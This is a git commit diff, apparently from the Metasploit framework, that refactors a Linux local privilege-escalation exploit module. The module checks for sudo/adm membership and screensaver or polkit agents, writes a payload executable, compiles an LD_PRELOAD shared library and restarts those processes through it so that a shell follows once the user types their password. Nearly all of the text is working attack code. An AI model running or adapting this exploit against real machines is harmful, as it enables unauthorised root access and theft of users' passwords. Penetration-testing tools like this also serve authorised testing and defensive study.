Clean exploit method

jvazquez-r7 · jvazquez-r7 · commit 92b350511923 · 2014-12-24T14:49:19.000-06:00
diff --git a/modules/exploits/linux/local/desktop_privilege_escalation.rb b/modules/exploits/linux/local/desktop_privilege_escalation.rb
@@ -61,13 +61,51 @@ def initialize(info={})
   end
 
   def check
-    output = cmd_exec("if which perl && which sudo && id|grep -E 'sudo|adm' && pidof xscreensaver gnome-screensaver polkit-gnome-authentication-agent-1;then echo OK;fi").gsub("\r","")
+    check_command = 'if which perl && '
+    check_command << 'which sudo && '
+    check_command << 'id|grep -E \'sudo|adm\' && '
+    check_command << 'pidof xscreensaver gnome-screensaver polkit-gnome-authentication-agent-1;'
+    check_command << 'then echo OK;'
+    check_command << 'fi'
+
+    output = cmd_exec(check_command).gsub("\r", '')
+
     vprint_status(output)
+
     if output['OK'] == 'OK'
       return Exploit::CheckCode::Vulnerable
-    else
-      return Exploit::CheckCode::Safe
     end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    exe_file = "#{datastore['WritableDir']}/#{rand_text_alpha(3 + rand(5))}.elf"
+
+    print_status("Writing payload executable to '#{exe_file}'")
+    write_file(exe_file, generate_payload_exe())
+    cmd_exec("chmod +x #{exe_file}")
+
+
+    cpu = nil
+    if target['Arch'] == ARCH_X86
+      cpu = Metasm::Ia32.new
+    elsif target['Arch'] == ARCH_X86_64
+      cpu = Metasm::X86_64.new
+    end
+    lib_data = Metasm::ELF.compile_c(cpu, c_code(exe_file)).encode_string(:lib)
+    lib_file = "#{datastore['WritableDir']}/#{rand_text_alpha(3 + rand(5))}.so"
+
+    print_status("Writing lib file to '#{lib_file}'")
+    write_file(lib_file,lib_data)
+
+    print_status('Restarting processes (screensaver/policykit)')
+    restart_commands = get_restart_commands()
+    restart_commands.each do |cmd|
+      cmd['LD_PRELOAD_PLACEHOLDER'] = lib_file
+      cmd_exec(cmd)
+    end
+    print_status('The exploit module has finished. However, getting a shell will probably take a while (until the user actually enters the password). Remember to keep a handler running.')
   end
 
   def get_restart_commands
@@ -96,12 +134,7 @@ def get_restart_commands
     return process_restart_commands
   end
 
-  def exploit
-    exe_file = "#{datastore['WritableDir']}/#{rand_text_alpha(3 + rand(5))}.elf"
-    print_status("Writing payload executable to '#{exe_file}'")
-    write_file(exe_file, generate_payload_exe())
-    cmd_exec "chmod +x #{exe_file}"
-    lib_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.so"
+  def c_code(exe_file)
     c = %Q|
 // A few constants/function definitions/structs copied from header files
 #define RTLD_NEXT      ((void *) -1l)
@@ -172,22 +205,7 @@ def exploit
   return;
 }
 |
-    cpu = nil
-    if target['Arch'] == ARCH_X86
-      cpu = Metasm::Ia32.new
-    elsif target['Arch'] == ARCH_X86_64
-      cpu = Metasm::X86_64.new
-    end
-    lib_data = Metasm::ELF.compile_c(cpu, c).encode_string(:lib)
-    print_status("Writing lib file to '#{lib_file}'")
-    write_file(lib_file,lib_data)
-    print_status('Restarting processes (screensaver/policykit)')
-    process_restart_commands = get_restart_commands()
-    process_restart_commands.each do |cmd|
-      cmd['LD_PRELOAD_PLACEHOLDER'] = lib_file
-      cmd_exec(cmd)
-    end
-    print_status('The exploit module has finished. However, getting a shell will probably take a while (until the user actually enters the password). Remember to keep the handler running.')
+    c
   end
 end
 
